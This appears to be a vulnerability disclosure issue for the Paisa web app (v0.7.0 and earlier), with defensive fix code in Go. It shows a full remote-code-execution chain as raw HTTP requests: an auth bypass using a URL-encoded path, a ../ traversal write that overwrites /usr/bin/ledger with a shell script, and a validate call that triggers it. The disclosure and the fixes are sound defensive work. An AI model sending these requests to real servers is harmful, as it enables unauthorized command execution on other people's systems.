paisa <=v0.7.0 web server has an unauthorized remote command execution vulnerability #294

@pankass

Description

Describe your Environment
OS: Linux
Paisa Version: 0.7.0
App Variant: Docker

Vulnerability description
There is a vulnerability in Paisa's authentication mechanism. Even after the administrator has set up an account, an unauthenticated attacker can bypass authentication by URL-encoding the HTTP request URI, and can then use /api/sheets/save to overwrite the /usr/bin/ledger file, achieving remote command execution.

To Reproduce
Steps to reproduce the behavior:

  1. Start a Paisa server with Docker.
  2. Restrict unauthenticated access by setting up an account. The core authentication middleware, however, has a flaw.

Here c.Request.RequestURI is used to decide which routes require authentication, but c.Request.RequestURI is the raw, undecoded request URI. The gin framework selects routes based on c.Request.URL.Path (the decoded path), so the middleware check can be bypassed by URL-encoding the path, like this:

```http
GET /%61pi/config HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
```


  3. After bypassing authentication, use the arbitrary file write in /api/sheets/save to overwrite the /usr/bin/ledger file:

```http
POST /%61pi/sheets/save HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 60

{"name":"../../../usr/bin/ledger","content":"#!/bin/sh\nid"}
```


  4. Finally, call /api/editor/validate, which runs the ledger binary and so executes the overwritten file:

```http
POST /%61pi/editor/validate HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 2

{}
```


Fix suggestions

  1. Have the authentication middleware check c.Request.URL.Path instead of c.Request.RequestURI, so that the check and gin's routing agree on the path.
  2. Fix the directory traversal in SaveSheetFile caused by ../ segments in the sheet name.
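The two fix suggestions side by side, as an added example that is not Paisa's code: plain net/http stand-ins (gin's c.Request is an *http.Request, so the same functions apply in a gin middleware), with the path-prefix check on the raw request line beside the corrected check on the decoded path, and a containment check for the sheet name. The sheet directory "/data/sheets" and the sheet names are constructed sample values.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"path/filepath"
	"strings"
)

// needsAuthVulnerable mirrors the flaw in the report: it inspects the raw
// request line, so "/%61pi/config" does not look like an /api/ route.
func needsAuthVulnerable(r *http.Request) bool {
	return strings.HasPrefix(r.RequestURI, "/api/")
}

// needsAuthFixed applies fix suggestion 1: r.URL.Path is the decoded path
// the router matches on, so the check and the routing agree.
func needsAuthFixed(r *http.Request) bool {
	return strings.HasPrefix(r.URL.Path, "/api/")
}

// checkTarget parses a request-target as the server would from the wire
// (httptest.NewRequest fills in RequestURI) and reports both verdicts.
func checkTarget(target string) (vulnerable, fixed bool) {
	r := httptest.NewRequest(http.MethodGet, target, nil)
	return needsAuthVulnerable(r), needsAuthFixed(r)
}

// safeSheetPath applies fix suggestion 2: the user-supplied name is joined
// onto the sheet directory and rejected if the cleaned result leaves it.
func safeSheetPath(baseDir, name string) (string, error) {
	base := filepath.Clean(baseDir)
	full := filepath.Join(base, name) // Join cleans, collapsing ../ segments
	if !strings.HasPrefix(full, base+string(filepath.Separator)) {
		return "", errors.New("sheet name escapes the sheet directory")
	}
	return full, nil
}

func main() {
	for _, t := range []string{"/api/config", "/%61pi/config"} {
		v, f := checkTarget(t)
		fmt.Printf("%-14s vulnerable check: %-5v fixed check: %v\n", t, v, f)
	}
	for _, n := range []string{"2024/expenses.ledger", "../../../usr/bin/ledger"} {
		p, err := safeSheetPath("/data/sheets", n) // constructed sample values
		fmt.Printf("%-26q -> %q err=%v\n", n, p, err)
	}
}
```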
